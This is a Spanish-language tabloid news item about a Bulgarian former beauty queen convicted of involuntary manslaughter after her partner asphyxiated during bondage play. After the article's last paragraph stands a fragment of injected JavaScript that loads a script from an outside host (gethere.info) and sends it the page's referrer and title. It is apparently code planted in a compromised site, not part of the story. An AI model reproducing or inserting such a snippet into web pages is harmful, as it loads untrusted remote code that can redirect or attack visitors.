Exreina de belleza mata a su pareja durante el acto sexual

Involuntariamente, la búlgara Anita Meyzer le quitó la vida a su cónyuge al elevar al máximo su éxtasis en una noche pasional

  

La exreina de belleza Anita Meyzer despojó de la vida a su amado tras elevar al máximo el acto sexual con sadomasoquismo incluido.

Nikolai Dimov, novio de la búlgara tenía la fantasía de ser ‘maltratado’, para ello pidió a su mujer que lo amarrara del cuello y las extremidades con unos lazos de plásticos, no obstante, después de un tiempo no pudo liberarse y murió asfixiado.

Los elementos policiacos indicaron que Meyzer intentó mentirles por la causa del deceso, pues tenía pena de que se ventilara su vida sexual.

Anita relató que había salido de compras y al regresar lo encontró sin vida, sin embargo, cuando se dieron cuenta de la calumnia intentó sobornarlos con 300 mil euros.

Al final, la policía la declaró culpable de homicidio involuntario, por lo que deberá pasar de tres a cuatro años en prisión.

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;